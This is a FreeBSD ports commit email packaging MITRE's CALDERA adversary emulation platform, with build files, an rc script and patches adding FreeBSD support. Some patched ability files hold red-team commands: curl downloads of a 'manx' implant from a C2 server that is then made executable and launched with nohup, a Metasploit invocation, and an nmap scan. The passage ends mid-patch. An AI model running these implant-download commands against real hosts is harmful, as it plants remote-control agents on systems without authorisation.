Date: Sat, 29 Apr 2023 06:09:26 GMT From: Jose Alonso Cardenas Marquez <acm@FreeBSD.org> To: ports-committers@FreeBSD.org, dev-commits-ports-all@FreeBSD.org, dev-commits-ports-main@FreeBSD.org Subject: git: 84e20fa24498 - main - security/caldera: New port: Automated Adversary Emulation Platform Message-ID: <202304290609.33T69QrF017173@gitrepo.freebsd.org>
next in thread | raw e-mail | index | archive | help
The branch main has been updated by acm: URL: https://cgit.FreeBSD.org/ports/commit/?id=84e20fa24498f24ec36a846f4bb69cad07224937 commit 84e20fa24498f24ec36a846f4bb69cad07224937 Author: Jose Alonso Cardenas Marquez <acm@FreeBSD.org> AuthorDate: 2023-04-29 06:08:03 +0000 Commit: Jose Alonso Cardenas Marquez <acm@FreeBSD.org> CommitDate: 2023-04-29 06:08:03 +0000 security/caldera: New port: Automated Adversary Emulation Platform CALDERA a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. It is built on the MITRE ATT&CK framework and is an active research project at MITRE. The framework consists of two components: - The core system. This is the framework code, consisting of what is available in this repository. Included is an asynchronous command-and-control (C2) server with a REST API and a web interface. - Plugins. These repositories expand the core framework capabilities and providing additional functionality. Examples include agents, reporting, collections of TTPs and more. --- security/Makefile | 1 + security/caldera/Makefile | 95 ++ security/caldera/distinfo | 35 + security/caldera/files/caldera.in | 84 ++ ...lities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml | 11 + ...hering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml | 11 + .../patch-plugins_access_data_payloads_scanner.sh | 11 + .../files/patch-plugins_atomic_app_atomic__svc.py | 11 + .../files/patch-plugins_emu_app_emu__svc.py | 11 + .../patch-plugins_gameboard_app_gameboard__api.py | 11 + .../files/patch-plugins_human_templates_human.html | 40 + ...ontrol_356d1722-7784-40c4-822b-0cf864b0b36d.yml | 33 + .../files/patch-plugins_manx_update-shells.sh | 12 + ...ontrol_1837b43e-4fff-46b2-a604-a602f7540469.yml | 15 + ...ection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml | 11 + ...ection_3b4640bc-eacb-407a-a997-105e39788781.yml | 18 + ...ection_930236c2-5397-4868-8c7b-72e294a5a376.yml | 18 + ...ection_9bc10f37-0853-4d73-b547-019c11eda22f.yml | 18 + ...ection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml | 11 + ...unting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml | 11 + ...unting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml | 11 + ...unting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml | 11 + ...sponse_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml | 18 + ...sponse_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml | 18 + ...sponse_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml | 18 + ...sponse_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml | 18 + ...sponse_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml | 18 + ..._setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml | 11 + ..._setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml | 18 + ..._setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml | 18 + ..._setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml | 18 + ..._setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml | 18 + ..._setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml | 18 + ..._setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml | 11 + .../files/patch-plugins_sandcat_app_sand__svc.py | 14 + ...ontrol_2f34977d-9558-4c12-abad-349716777c6b.yml | 45 + .../files/patch-plugins_sandcat_update-agents.sh | 16 + ...gins_stockpile_app_obfuscators_base64__basic.py | 12 + ...ins_stockpile_app_obfuscators_base64__jumble.py | 12 + ...tockpile_app_obfuscators_base64__no__padding.py | 12 + ...ins_stockpile_app_obfuscators_caesar__cipher.py | 12 + ...gins_stockpile_app_obfuscators_steganography.py | 12 + ...ection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml | 11 + ...ection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml | 11 + ...ection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml | 18 + ...ection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml | 11 + ...ection_6469befa-748a-4b9c-a96d-f191fde47d89.yml | 11 + ...ection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml | 18 + ...ection_89955f55-529d-4d58-bed4-fed9e42515ec.yml | 11 + ...ection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml | 11 + ...ection_b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | 11 + ...ontrol_0ab383be-b819-41bf-91b9-1bd4404d83bf.yml | 15 + ...access_422526ec-27e9-429a-995b-c686a29561a4.yml | 12 + ...access_de632c2d-a729-4b77-b781-6a6b09c148ba.yml | 13 + ...vasion_36eecb80-ede3-442b-8774-956e906aff02.yml | 11 + ...vasion_43b3754c-def4-4699-a673-1d85648fda6a.yml | 15 + ...vasion_4cd4eb44-29a7-4259-91ae-e457b283a880.yml | 17 + ...vasion_5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | 15 + ...covery_30732a56-4a23-4307-9544-09caf2ed29d5.yml | 11 + ...covery_335cea7b-bec0-48c6-adfb-6066070f5f68.yml | 11 + ...covery_3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml | 11 + ...covery_3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml | 11 + ...covery_47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml | 17 + ...covery_52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml | 11 + ...covery_5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml | 12 + ...covery_5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml | 12 + ...covery_5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml | 11 + ...covery_638fb6bb-ba39-4285-93d1-7e4775b033a8.yml | 13 + ...covery_6c91884e-11ec-422f-a6ed-e76774b0daac.yml | 11 + ...covery_6e1a53c0-7352-4899-be35-fa7f364d5722.yml | 11 + ...covery_830bb6ed-9594-4817-b1a1-c298c0f9f425.yml | 10 + ...covery_85341c8c-4ecb-4579-8f53-43e3e91d7617.yml | 18 + ...covery_9849d956-37ea-49f2-a8b5-f2ca080b315d.yml | 11 + ...covery_a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | 11 + ...covery_b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml | 13 + ...covery_b6f545ef-f802-4537-b59d-2cb19831c8ed.yml | 13 + ...covery_bd527b63-9f9e-46e0-9816-b8434d2b8989.yml | 11 + ...covery_c0da588f-79f0-4263-8998-7496b1a40596.yml | 11 + ...covery_c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml | 11 + ...covery_ce485320-41a4-42e8-a510-f5a8fe96a644.yml | 11 + ...covery_e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml | 11 + ...covery_e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml | 20 + ...covery_fa6e8607-e0b1-425d-8924-9b894da5a002.yml | 11 + ...cution_b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml | 11 + ...ration_0582dc26-e0cf-4645-88cf-f37a02279976.yml | 11 + ...ration_110cea7a-5b03-4443-92ee-7ccefaead451.yml | 18 + ...ration_2f90d4de-2612-4468-9251-b220e3727452.yml | 11 + ...ration_300157e5-f4ad-4569-b533-9d1fa0e74d74.yml | 18 + ...ration_3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml | 18 + ...ration_4a1120a5-971c-457f-bb07-60641b4723fd.yml | 11 + ...ration_5c5b0392-1daa-45e1-967c-2f361ce78849.yml | 11 + ...ration_a201bec2-a193-4b58-bf0e-57fa621da474.yml | 18 + ...ration_ba0deadb-97ac-4a4c-aa81-21912fc90980.yml | 11 + ...ration_d754878c-17dd-46dc-891c-a993f8a10336.yml | 18 + ...ration_e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml | 18 + ...ration_ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml | 11 + ...impact_46da2385-cf37-49cb-ba4b-a739c7a19de4.yml | 22 + ...impact_47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml | 11 + ...impact_55f9600a-756f-496b-b27f-682052dc429c.yml | 11 + ...vement_10a9d979-e342-418a-a9b0-002c483e0fa6.yml | 16 + ...vement_4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml | 15 + ...lation_10681f2f-be03-44af-858d-f2b0812df185.yml | 12 + ...aining_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml | 11 + ...aining_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml | 17 + ...aining_e13c4e45-d19f-440e-8a72-fad728a1789c.yml | 13 + ...aining_f0d77555-fa79-4884-8afd-73d39f887879.yml | 15 + ...aining_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml | 18 + .../caldera/files/patch-templates_abilities.html | 11 + .../caldera/files/patch-templates_adversaries.html | 20 + security/caldera/files/patch-templates_agents.html | 32 + security/caldera/files/pkg-message.in | 53 + security/caldera/pkg-descr | 14 + security/caldera/pkg-plist | 1283 ++++++++++++++++++++ 113 files changed, 3101 insertions(+) diff --git a/security/Makefile b/security/Makefile index 624766505d37..2c7b9d8c6644 100644 --- a/security/Makefile +++ b/security/Makefile @@ -62,6 +62,7 @@ SUBDIR += bzrtp SUBDIR += ca_root_nss SUBDIR += caesarcipher + SUBDIR += caldera SUBDIR += calife SUBDIR += cardpeek SUBDIR += cargo-audit diff --git a/security/caldera/Makefile b/security/caldera/Makefile new file mode 100644 index 000000000000..8648038da272 --- /dev/null +++ b/security/caldera/Makefile @@ -0,0 +1,95 @@ +PORTNAME= caldera +DISTVERSION= 4.1.0 +CATEGORIES= security python + +MAINTAINER= acm@FreeBSD.org +COMMENT= Automated Adversary Emulation Platform +WWW= https://github.com/mitre/caldera + +LICENSE= APACHE20 +LICENSE_FILE= ${WRKSRC}/LICENSE + +RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}cryptography>0:security/py-cryptography@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \ + ${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \ + upx>0:archivers/upx \ + git>0:devel/git \ + bash>0:shells/bash + +USE_GITHUB= yes +GH_ACCOUNT= mitre +GH_PROJECT= ${PORTNAME} +GH_TUPLE= mitre:access:fff4c20:access/plugins/access \ + mitre:atomic:9e2c958:atomic/plugins/atomic \ + mitre:builder:1aca019:builder/plugins/builder \ + mitre:compass:fb88e02:compass/plugins/compass \ + mitre:debrief:d815b60:debrief/plugins/debrief \ + mitre:emu:5dbff82:emu/plugins/emu \ + mitre:fieldmanual:510d0b9:fieldmanual/plugins/fieldmanual \ + mitre:gameboard:3d98c32:gameboard/plugins/gameboard \ + mitre:human:4368dea:human/plugins/human \ + mitre:manx:e7205ea:manx/plugins/manx \ + mitre:mock:4ea3337:mock/plugins/mock \ + mitre:response:889213a:response/plugins/response \ + mitre:sandcat:de3405f:sandcat/plugins/sandcat \ + mitre:ssl:ac5bfcb:ssl/plugins/ssl \ + mitre:stockpile:9662f27:stockpile/plugins/stockpile \ + mitre:training:e309b0f:training/plugins/training + +USES= go:run python:3.8+ + +NO_ARCH= yes +NO_BUILD= yes + +USE_RC_SUBR= ${PORTNAME:S/-/_/} +SUB_FILES= pkg-message +SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \ + WWWDIR=${WWWDIR} + +OPTIONS_DEFINE= HAPROXY +OPTIONS_DEFAULT=HAPROXY +HAPROXY_DESC= Support for HTTPS +HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18 + +post-extract: + ${RM} -R ${WRKSRC}/.github + cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \ + .git* .pre* .stylelintrc.json Dockerfile + +post-patch: + cd ${WRKSRC} && \ + ${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \; + +do-install: + @cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR} + +.include <bsd.port.mk> diff --git a/security/caldera/distinfo b/security/caldera/distinfo new file mode 100644 index 000000000000..d9ca85b369cf --- /dev/null +++ b/security/caldera/distinfo @@ -0,0 +1,35 @@ +TIMESTAMP = 1681965363 +SHA256 (mitre-caldera-4.1.0_GH0.tar.gz) = 342516c29926dbd7e96bc2ba1558779d5ee423eac97a4c48d0245d7480a790eb +SIZE (mitre-caldera-4.1.0_GH0.tar.gz) = 3462547 +SHA256 (mitre-access-fff4c20_GH0.tar.gz) = 087dd5de918c5a2a5a73888abb3839e6d43335ac5f26ee739038813631a24358 +SIZE (mitre-access-fff4c20_GH0.tar.gz) = 8485 +SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085 +SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142 +SHA256 (mitre-builder-1aca019_GH0.tar.gz) = 563c54beed985b11edb96c7ec3a8349f8328a6534750801fa71693ed1cf34346 +SIZE (mitre-builder-1aca019_GH0.tar.gz) = 7946 +SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16 +SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907 +SHA256 (mitre-debrief-d815b60_GH0.tar.gz) = 565e234e52157b6259752c474c40eaa96f15921595f299cbd7875f4bc51e73aa +SIZE (mitre-debrief-d815b60_GH0.tar.gz) = 4419572 +SHA256 (mitre-emu-5dbff82_GH0.tar.gz) = 45b980caf2b9a59d1d9f4bba69334e1b74f036ae667bc510dfc1422ef58829d9 +SIZE (mitre-emu-5dbff82_GH0.tar.gz) = 16962 +SHA256 (mitre-fieldmanual-510d0b9_GH0.tar.gz) = d908a6f0eb4bf8295bc6c92e23aae5984bcd2006069af9ed880978b76c7c0984 +SIZE (mitre-fieldmanual-510d0b9_GH0.tar.gz) = 7811262 +SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a +SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753 +SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a +SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846 +SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470 +SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820 +SHA256 (mitre-mock-4ea3337_GH0.tar.gz) = 36447c30cdff3869796948bff8940b24e710f242e70255578095a10df4d0c5db +SIZE (mitre-mock-4ea3337_GH0.tar.gz) = 5470 +SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee +SIZE (mitre-response-889213a_GH0.tar.gz) = 24463 +SHA256 (mitre-sandcat-de3405f_GH0.tar.gz) = dbb111552220d6f108f852f3d442dcc90d3457c488fbec3f176a4638a611cd56 +SIZE (mitre-sandcat-de3405f_GH0.tar.gz) = 7564017 +SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12 +SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395 +SHA256 (mitre-stockpile-9662f27_GH0.tar.gz) = ab74994666c6759261346bb0c7a653dde5982273d04afd18eb26e7d57c78210c +SIZE (mitre-stockpile-9662f27_GH0.tar.gz) = 4777470 +SHA256 (mitre-training-e309b0f_GH0.tar.gz) = 505d4d4447c9d35e2062064abe1d689f7bc92c818ccb450848e6e57619c24375 +SIZE (mitre-training-e309b0f_GH0.tar.gz) = 492099 diff --git a/security/caldera/files/caldera.in b/security/caldera/files/caldera.in new file mode 100644 index 000000000000..aaedbb017d79 --- /dev/null +++ b/security/caldera/files/caldera.in @@ -0,0 +1,84 @@ +#!/bin/sh + +# PROVIDE: caldera +# REQUIRE: NETWORKING +# KEYWORD: shutdown +# +# Configuration settings for caldera in /etc/rc.conf: +# +# caldera_enable: run caldera as service (default=NO) +# caldera_flags: additional flags for caldera server +# + +. /etc/rc.subr + +name=caldera +rcvar=caldera_enable + +load_rc_config ${name} + +export PATH="${PATH}:/usr/local/bin:/usr/local/sbin" + +: ${caldera_enable:=NO} +: ${caldera_flags="--insecure"} + +caldera_user="www" + +pidfile="/var/run/${name}.pid" + +caldera_wwwdir="%%WWWDIR%%" +python_command="%%PYTHON_CMD%%" +python_script="${caldera_wwwdir}/server.py" +start_cmd=${name}_start +status_cmd=${name}_status +stop_cmd=${name}_stop +restart_cmd=${name}_restart +extra_commands="status" + +caldera_start() +{ + if [ ! -f ${pidfile} ] + then + cd ${caldera_wwwdir} && \ + daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o /var/log/caldera.log \ + ${python_command} ${python_script} \ + ${caldera_flags} + + echo "Starting ${name}" + else + echo "${name} is running as pid" `cat ${pidfile}` + fi +} + +caldera_status() +{ + # If running, show pid + if [ -f ${pidfile} ] + then + echo "${name} is running as pid" `cat ${pidfile}` + else + echo "${name} is not running" + fi +} + +caldera_stop() +{ + if [ -f ${pidfile} ] + then + kill `cat ${pidfile}` + rm ${pidfile} + echo "Stopping ${name}" + else + echo "${name} not running? (check ${pidfile})." + fi +} + +caldera_restart() +{ + echo "Performing restart ${name}" + caldera_stop + sleep 3 + caldera_start +} + +run_rc_command "$1" diff --git a/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml new file mode 100644 index 000000000000..c0bc8a3c91ed --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_abilities_build-capabilities_bed8f28e-c0ed-463e-9e31-d5607e5473df.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +@@ -7,7 +7,7 @@ + name: Build or acquire exploits + attack_id: T1349 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red} diff --git a/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml new file mode 100644 index 000000000000..f7304f2ee2ad --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_abilities_technical-information-gathering_567eaaba-94cc-4a27-83f8-768e5638f4e1.yml @@ -0,0 +1,11 @@ +--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +@@ -7,7 +7,7 @@ + name: Conduct active scanning + attack_id: T1254 + platforms: +- darwin,linux: ++ darwin,freebsd,linux: + sh: + command: | + ./scanner.sh #{target.ip} diff --git a/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh new file mode 100644 index 000000000000..acdadfff6d43 --- /dev/null +++ b/security/caldera/files/patch-plugins_access_data_payloads_scanner.sh @@ -0,0 +1,11 @@ +--- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC ++++ plugins/access/data/payloads/scanner.sh +@@ -1,5 +1,5 @@ +-#!/bin/bash ++#!/bin/sh + + echo '[+] Starting basic NMAP scan' + nmap -Pn $1 +-echo '[+] Complete with module' +\ No newline at end of file ++echo '[+] Complete with module' diff --git a/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py new file mode 100644 index 000000000000..abc3e67c6ccf --- /dev/null +++ b/security/caldera/files/patch-plugins_atomic_app_atomic__svc.py @@ -0,0 +1,11 @@ +--- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC ++++ plugins/atomic/app/atomic_svc.py +@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld + from app.utility.base_service import BaseService + from app.objects.c_agent import Agent + +-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux') ++PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd') + EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh') + RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL) + PREFIX_HASH_LEN = 6 diff --git a/security/caldera/files/patch-plugins_emu_app_emu__svc.py b/security/caldera/files/patch-plugins_emu_app_emu__svc.py new file mode 100644 index 000000000000..38eb16d85180 --- /dev/null +++ b/security/caldera/files/patch-plugins_emu_app_emu__svc.py @@ -0,0 +1,11 @@ +--- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC ++++ plugins/emu/app/emu_svc.py +@@ -12,7 +12,7 @@ from app.utility.base_service import BaseService + + + class EmuService(BaseService): +- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'} ++ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'} + + def __init__(self): + self.log = self.add_service('emu_svc', self) diff --git a/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py new file mode 100644 index 000000000000..7121866698a1 --- /dev/null +++ b/security/caldera/files/patch-plugins_gameboard_app_gameboard__api.py @@ -0,0 +1,11 @@ +--- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC ++++ plugins/gameboard/app/gameboard_api.py +@@ -244,7 +244,7 @@ class GameboardApi(BaseService): + reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace + ability_id = str(uuid.uuid4()) + executors = [] +- for pl in ['windows', 'darwin', 'linux']: ++ for pl in ['windows', 'darwin', 'linux', 'freebsd']: + reference_executor = reference_ability.find_executor('elasticsearch', pl) + if not reference_executor: + continue diff --git a/security/caldera/files/patch-plugins_human_templates_human.html b/security/caldera/files/patch-plugins_human_templates_human.html new file mode 100644 index 000000000000..9bc604e58123 --- /dev/null +++ b/security/caldera/files/patch-plugins_human_templates_human.html @@ -0,0 +1,40 @@ +--- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC ++++ plugins/human/templates/human.html +@@ -60,6 +60,7 @@ + <select id="base-platform"> + <option disabled="disabled" selected="">Select target OS</option> + <option value="darwin">MacOS</option> ++ <option value="freebsd">FreeBSD</option> + <option value="linux">Linux</option> + <option value="windows-psh">Windows (PowerShell)</option> + </select> +@@ -257,6 +258,11 @@ + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + + '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; + break; ++ case "freebsd": ++ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + ++ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + ++ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra; ++ break; + case "linux": + baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' + + ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' + +@@ -293,6 +299,10 @@ + $.each(extra, function(i, command) { + switch (platform) { + case "darwin": ++ command = command.replace(/\\/g, '\\\\'); ++ command = command.replace(/"/g, '\\\"'); ++ break; ++ case "freebsd": + command = command.replace(/\\/g, '\\\\'); + command = command.replace(/"/g, '\\\"'); + break; +@@ -317,4 +327,4 @@ + return provided_value || default_value; + } + +-</script> +\ No newline at end of file ++</script> diff --git a/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml new file mode 100644 index 000000000000..a641bf2abe45 --- /dev/null +++ b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml @@ -0,0 +1,33 @@ +--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC ++++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml +@@ -57,6 +57,30 @@ + contact="tcp"; + agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; + nohup ./$agent -http $server -socket $socket -contact $contact & ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ socket="#{app.contact.tcp}"; ++ contact="tcp"; ++ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; ++ chmod 